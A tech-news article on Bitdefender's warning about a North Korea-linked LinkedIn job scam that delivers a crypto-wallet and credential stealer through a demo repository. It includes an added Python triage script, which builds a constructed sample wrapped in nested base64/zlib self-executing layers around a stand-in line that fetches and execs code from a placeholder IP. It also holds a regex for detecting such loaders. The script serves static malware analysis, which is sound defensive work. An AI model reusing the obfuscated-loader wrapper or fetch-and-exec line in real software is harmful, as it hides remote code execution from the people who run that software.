![Story image](https://itbrief.asia/uploads/story/2025/02/06/techday_f_ac7c0c681eb307365fb9.webp)
Alert issued over North Korean LinkedIn job offer scam
Bitdefender has issued a warning concerning a cybercriminal group linked to North Korea, which has been delivering malware and stealing credentials through fraudulent LinkedIn job offers.
This warning comes after a Bitdefender researcher discovered that the so-called 'Lazarus Group' was targeting them as part of this cyber scheme. The scam is initiated with a seemingly appealing job offer that tempts victims into divulging personal data. The perpetrators provide a repository with questions that require answers; however, the repository in fact executes malicious code capable of stealing data, using the device for cryptocurrency mining, disabling security measures, and other harmful activities.
Bitdefender has cautioned job seekers on LinkedIn to be alert to vague job descriptions, poor communication, suspicious email domains, and strongly advises against running unverified code.
The fraudulent operation commences with a promising message about an opportunity to work on a decentralised cryptocurrency exchange. While intentionally vague in detail, the proposal of remote work, flexible hours, and competitive pay can be quite attractive, drawing in unsuspecting individuals. Variations of the scam have also appeared, with fake projects related to travel or finance. Once interested, the target is asked for a CV or a link to a personal GitHub repository, which the scammers can exploit to build a facade of trust.
Upon submission of the required information, the hacker shares a repository, supposedly containing the project's 'minimum viable product' (MVP), alongside a document with questions that necessitate execution of the demo. The code looks innocuous at first but contains a heavily obfuscated script that surreptitiously loads malicious code from an external source.
Research conducted by Bitdefender has identified that the payload is a cross-platform information stealer deployable on Windows, macOS, and Linux. This tool is designed to target popular cryptocurrency wallets by seeking out browser extensions related to cryptocurrency. It further collects significant files linked to these extensions and login data from the browsers in use, transmitting this information to a malicious IP address.
Afterwards, a JavaScript stealer downloads and executes a Python script named main99_65.py. This script activates further malicious activities, decompressing and decoding itself multiple times to reveal additional scripts that enable the download of subsequent Python modules named mlip.py, pay.py, and bow.py.
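As an added illustration, not Bitdefender's analysis tooling or any code from the campaign, the following Python script shows how an analyst would statically peel the kind of nested base64/zlib layers described above (the obfuscated loader in the repository and the self-decoding Python stage) to see what the innermost stage does, without ever executing it. The sample it unwraps is constructed here; `build_sample`, `peel`, the indicator patterns, and the 203.0.113.10 documentation-range address are all assumptions for the demo.

```python
"""Static triage for 'run this demo' repositories: locate encoded blobs and
peel them layer by layer without executing anything.

Added illustration, not Bitdefender's tooling; the sample is constructed."""
import base64
import re
import zlib

# Tokens an analyst would flag before running unknown code: dynamic code
# execution, process spawning, and URLs pointing at a raw IP address.
SUSPICIOUS = re.compile(
    r"\b(?:eval|exec|compile|__import__)\s*\(|"
    r"\bsubprocess\b|\bos\.system\b|"
    r"https?://\d{1,3}(?:\.\d{1,3}){3}"
)
# Long base64-looking literals are the usual carrier for packed layers.
B64_LITERAL = re.compile(r"[A-Za-z0-9+/=]{40,}")

# Constructed innermost stage: a stand-in that only carries the indicators
# we want to surface (203.0.113.0/24 is a documentation-only range).
INNER_STAGE = (
    "url = 'http://203.0.113.10/stage'  # constructed: documentation-range IP\n"
    "exec(fetch(url))  # constructed stand-in for a real loader\n"
)


def build_sample(inner: str, depth: int = 3) -> str:
    """Constructed sample: wrap `inner` in `depth` zlib+base64 layers, each
    presented as a one-line self-unpacking loader (hypothetical, for the demo)."""
    text = inner
    for _ in range(depth):
        blob = base64.b64encode(zlib.compress(text.encode())).decode()
        text = (
            "import base64, zlib\n"
            f"exec(zlib.decompress(base64.b64decode('{blob}')))\n"
        )
    return text


def unwrap_layer(blob: bytes):
    """One static decode step: strict base64, then zlib if it applies.
    Returns the inner bytes, or None if the blob is not valid base64."""
    try:
        decoded = base64.b64decode(blob, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    try:
        return zlib.decompress(decoded)
    except zlib.error:
        return decoded  # base64 only, no compression on this layer


def peel(source: str, max_layers: int = 10) -> tuple[list[str], list[str]]:
    """Iteratively unwrap encoded layers embedded in `source`.

    Returns (layers, findings): the decoded text of each layer, outermost
    first, and the sorted suspicious tokens found in the innermost layer.
    Nothing is executed; each layer is only decoded and searched."""
    layers: list[str] = []
    current = source
    for _ in range(max_layers):
        match = B64_LITERAL.search(current)
        if not match:
            break
        inner = unwrap_layer(match.group(0).encode())
        if inner is None:
            break
        try:
            current = inner.decode("utf-8")
        except UnicodeDecodeError:
            break  # binary payload: hand off to a sandbox, don't run it
        layers.append(current)
    findings = sorted({m.group(0) for m in SUSPICIOUS.finditer(current)})
    return layers, findings


if __name__ == "__main__":
    sample = build_sample(INNER_STAGE, depth=3)
    layers, findings = peel(sample)
    print(f"peeled {len(layers)} layer(s); indicators in innermost stage: {findings}")
    print(layers[-1] if layers else "no encoded layers found")
```

The point of the design is that every step is a decode, never an `exec`: a candidate repository can be triaged on an analyst workstation, and if a layer turns out to be binary rather than text the tool stops and leaves dynamic analysis to a sandbox.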
The module mlip.py is tailored to hook keyboard events particularly in web browsers and monitor clipboard changes for crypto-related data, which is sent to a server controlled by the attacker. Another module, pay.py, gathers system information and valuable files, maintaining a persistent communication link for further commands. Meanwhile, bow.py focuses on browsers like Chrome, Brave, Opera, Yandex, and Microsoft Edge to extract and exfiltrate critical browser data.
The masterminds, believed to be North Korea-affiliated state-sponsored actors, such as the Lazarus Group, are notorious for using similar scams to infiltrate sectors like aviation, defence, and the nuclear industry, seeking to exfiltrate sensitive information and proprietary technologies.
As such malicious activities on social platforms are on the rise, Bitdefender emphasises the importance of caution. Red flags include vague job postings, suspicious repositories, and poor communication. Best practices suggest not running unverified code, verifying job offer authenticity, and scrutinising unsolicited communications.